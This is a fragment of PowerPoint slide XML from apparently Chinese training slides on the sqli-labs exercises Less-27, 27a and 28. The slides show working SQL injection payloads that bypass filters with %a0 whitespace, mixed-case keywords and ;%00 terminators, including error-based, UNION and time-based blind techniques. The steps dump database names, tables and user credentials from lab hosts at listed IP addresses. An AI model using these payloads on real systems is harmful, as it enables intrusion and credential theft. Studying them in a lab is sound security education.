              <a:t>  %a0  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>sElect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>  %a0 1, 2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>)  %a0  from  %a0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>    ;%00  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>拿到所有的数据库，一定要留意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>hint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>的提示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2824573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15089"/>
            <a:ext cx="10131425" cy="303747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-27_02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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>法二：使用报错注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1. http://121.199.30.46/Less-27/?id=1‘    %a0  ||    %a0   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(0x7e, ( database()  ) ), 1)  %a0  || ’1‘=‘1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>首先拿到数据库名称</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>2.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schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>  %a0 from  %a0   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>  %a0 limit %a0 1,1  ) ),1)  || %a0  ’1’=‘1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>通过这样查，可以拿到所有的库信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>3.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table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>  %a0 from  %a0   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> %a0 where %a0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> =  0x7365637572697479 %a0 limit %a0 1,1  ) ),1)  || %a0  ’1‘=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>通过遍历所有的表的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>4.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column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> %a0  from %a0  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> %a0  where %a0   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> = 0x7573657273  %a0 limit %a0 1,1  ) ),1)  || %a0  ’1‘=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>通过遍历取出所以都字段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>5. http://47.100.118.240:8888/Less-27/?id=1'  %a0 ||  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(0x7e, (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>SElect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> %a0  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(0x7e,username,password) from  %a0  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>security.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>  %a0 limit %a0 1,1  ) ),1)  || %a0 '1'=‘1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>通过遍历的方法取出里面所有的字段值。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3207980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60245"/>
            <a:ext cx="10131425" cy="303747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-27a_01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fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为了测试方便，我们在代码中加入：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>echo "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://47.100.118.240:8888/Less-27a/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://47.100.118.240:8888/Less-27/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时没有报错，我们将显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句的代码加到代码中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://47.100.118.240:8888/Less-27a/?id=1“;%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时显示正常，但是报错的信息不会显示在代码中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. http://47.100.118.240:8888/Less-27a/?id=1111“ %a0  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uNIon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  %a0   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sElEct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  %a0    1,2,3     ;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>得到数据可以回显的位置。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.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schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from    %a0  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>     ;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>取出了所有的库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6.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table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from  %a0    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> %a0    where  %a0    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = 0x7365637572697479     ;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>取出了所有的表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7.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column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) %a0  from %a0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  %a0 where %a0  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = 0x7573657273    ;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>取出了所有的字段名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8.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concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(0x7e,username,password))  %a0  from  %a0  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>security.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  ;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>取出所有的字段值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9820808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Less-27A_02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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>法二：使用基于时间的盲注  其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>%26%26 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>代表 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&amp;&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1. http://47.100.118.240:8888/Less-27a/?id=1“ %26%26 if( length(database())&gt;1, 1, sleep(5)    )  %26%26 %0a  ”1“=”1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注意：在句子后面不能使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，因为使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的情况下，无论如何情况返回都会是真。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>http://47.100.118.240:8888/Less-27a/?id=1“ %26%26 if( length(database())&gt;1, 1, sleep(5)    )  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> %0a  ”1“=”1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>这种写法是错误的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>2. http://47.100.118.240:8888/Less-27a/?id=1111“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> if( length(database())=1, 1, sleep(5)    )  %26%26  %0a  ”1“=”1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>这样写也是可以的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="528402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774827"/>
            <a:ext cx="12067309" cy="6083173"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>为了测试方便，我们在代码中加入：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>echo "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://47.100.118.240:8888/Less-28/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>显示正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://47.100.118.240:8888/Less-28/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>此时显示不正常，说明可能存在注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>接下来就是坑来了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>3. http://47.100.118.240:8888/Less-28/?id=1‘ || ’1‘=‘1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>这个时候数据回显正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>4. http://47.100.118.240:8888/Less-28/?id=1‘  %a0   union %a0   select %a0  1,2,3      || ’1‘=‘1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>这个正常的操作但是显示确实错误的？  我们将   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>进行替换一下</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>5. http://47.100.118.240:8888/Less-28/?id=1‘  %a0   union %a0   select %a0  1,2,3     ;%00  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>还是显示错误的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>问题在哪？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>通过查看源代码可知：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>/Less-28/?id=1‘   || ’1‘=‘2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>查询的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1"/>
              <a:t>sq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SELECT * FROM users WHERE id=('1'||'1'='2') LIMIT 0,1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3220132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27314"/>
            <a:ext cx="12067309" cy="5921829"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
